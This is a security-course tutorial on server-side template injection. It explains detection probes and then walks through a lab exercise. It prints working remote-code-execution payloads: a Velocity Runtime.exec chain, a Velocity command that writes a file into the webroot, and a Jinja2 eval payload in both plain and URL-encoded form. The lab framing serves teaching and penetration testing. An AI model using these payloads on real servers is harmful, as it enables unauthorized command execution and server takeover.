# Server-side Template Injection
The Server-Side Template Injection attack is much more dangerous and quite similar to the attack discussed in the basic course, i.e. Client-Side Template Injection.
Let us take a look at the names first. At first glance, the two attacks differ by name -- client-side and server-side.
The first attack is performed on the client side, so it is not as dangerous as its server-side counterpart. However, even client-side attacks can be dangerous, especially for other users. The injection of templates on the server side can even lead to control over the entire server due to the fact that the code of the executed templates works on the server side.
Of course, attacks of this type most often take advantage of the programmer’s trust in user data. Also, due to the complexity of template libraries and languages, it is often very difficult to avoid this attack.
In most cases, the attacker uses specific functions and classes and then uses more and more of them until they find a method that allows them to take control of the server.
Fixing these types of bugs proves very difficult.

While developers who use a narrow spectrum of tools with the template engine have nothing to worry about as long as they filter the data properly, developers of larger websites may have cause for concern, because the multitude of different methods appearing within e.g. various types of plug-ins often provide many opportunities for attack.

## SSTI (Server-side Template Injection) - attack procedure
SSTI usually occurs when the security level is too low or user data is considered trusted. Below I will present two ways to use the templates. One good, one bad:
I’ll start with the bad one:
```php
$output = $twig->render("Hello " . $_GET['name']);
```
And now the good one:
```php
$output = $twig->render("Hello {name}");
```
There is a difference at first glance. In the first case, the user-controlled GET parameter is used to retrieve information about the user. Additionally, after using it, there is no function that would filter the data. In this case, you could probably use template engine injection and try to use system functions. You could be tempted to check if it is not possible to use the XSS vulnerability.
The second code is a bit different from the previous one because, first, it does not retrieve information directly from the user, but it does not play a significant role. The most important thing is that the code tags are already here, and the template engine itself uses its functions, which by default try to filter out certain data. Using a template in this way is much safer, but it does not always guarantee success.

## SSTI - Fuzzing
We will rarely have access to the application code, so testing and detecting vulnerable fields for SSTIs is much more difficult. For this purpose, fuzzers are most commonly used, which dump various data into the fields in the application. In the case of template engines, this can be data that causes a syntax error, such as "{}'" and others.
Most often, the errors that are then thrown reveal a lot of information, usually enough to determine what parameter we are dealing with. There is even a special table on the Internet that features different ways of injecting data into template engines. Depending on the results of the injection, it is possible to precisely determine which template engine a given application uses.
```sh
https://dmeg.tech/2020/12/24/Finding%20and%20performing%20SSTI/
```

While performing an attack or a penetration test, it is common to start with simple injections like this one:
```twig
{{7*7}}
${7*7}
```
Thanks to this, it is possible to determine what syntax we are dealing with, and this brings us closer to getting to know the template engine. Of course, the result below should be 49, not content with braces.
In most cases, it is quite easy to determine the template engine judging by the language the app uses. The most popular template engines use certain programming languages that are inseparable from template engines. There are also many possibilities. The biggest difficulty is using the template engine later to use its functions to execute commands on the server side.


## Template Engines: Apache FreeMarker and Velocity, PHP Twig
As in the title, I will try to discuss the most popular template engines, because each of them has a slightly different syntax and a different use for taking control. On top of that, the vast majority of other template engines use the syntax of the main ones, which will also facilitate work with other engines and allow you to analyze the most common, i.e. the most popular attacks.
 - [__Apache FreeMarker__](https://freemarker.apache.org/) is a Java-based engine. Its syntax features the dollar sign and braces, e.g. `${code}`
 - __Velocity__ uses a special VTL (Velocity Template Language). It is characteristic of it to use the dollar sign and hash: `$`, `#`. Most often, in order to gain control over the server, it uses different classes of the Java language to finally use the RunTime class.
 - [__PHP Twig__](https://twig.symfony.com/) uses the syntax of two braces `{}`

## Developing an attack after detecting the template engine
During the identification process, using the fuzzer, we discovered that the template engine is particularly sensitive to the characters `#` and `$`. Most probably, the template engine here is Velocity.
Additionally, when trying to check if we are really dealing with this engine, we used a simple syntax
```java
#set ($run = 1 + 1) $run
```
which resulted in 2. This code is quite simple. It means executing the code in parentheses to be assigned to the run variable, and then that variable is displayed.
Once you sure that we are dealing with this engine, you can try to use coarser measures and try to execute the code on the server.
```java
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
```
First, we use a variable that allows us to get to and use different classes such as String, Character, and Runtime. Then the getRuntime() function is used to create the object, and the exec method is called from the object to execute the `whoami` command. The result of the operation is saved in the "$ex" variable. The next lines of code then display the result of that variable.
It is worth mentioning that the waitFor() function waits for the process to be executed.

Although if we did not need to get the results, but only wanted create a file in webroot, we could be tempted to delete almost the entire code. Just like below:
```java
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("echo 'test' > /var/www/html/test"))
```
As you can see in the case of using Velocity on a vulnerable website, the key feature that allows us to enter the system is the lack of data filtering and too many classes that can be used.
Likewise, similar attacks can be carried out on other template engines.

Most popular templates have RCE exploits ready, as long as data injection is possible. Some applications additionally filter classes, but usually not all of them, so you can search for vectors by other classes, so that at the end you can call dangerous methods of classes related to the system.

## SSTI Exercise
The exercise is located at:
```sh
http://vuln.vms.perkmylife.com:81
```
At the beginning, we only see the string with the name "guest", the "name" parameter is responsible for the name. It is worth to use a fuzzer to verify whether it's the only parameter available.

First, we need to identify the injection site and the engine. 
The "name" parameter will be a good candidate, because it's the only one we currently know.

Let us try to inject the two most popular syntaxes:
```twig
{{7*7}}
${7*7}
```
It turns out that the latter syntax works very well. Which suggests that we are dealing with Python [Jinja2](https://pypi.org/project/Jinja2/), PHP [Twig](https://twig.symfony.com/) or other less known engine. 

Let us try one of the exploits for Jinja2
```twig
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
```
Before the payload formulated in this way is transferred to the database, it makes sense to use the URL encode, so as not to spoil the URL syntax.
```
?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%0A%20%20%7B%25%20endif%20%25%7D%0A%0A%20%20%7B%25%20endfor%20%25%7D%0A%0A%7B%25%20endif%20%25%7D%0A%0A%7B%25%20endfor%20%25%7D
```

Now we should see the user name that is on the server, that is, a proof that the code can be executed on the server.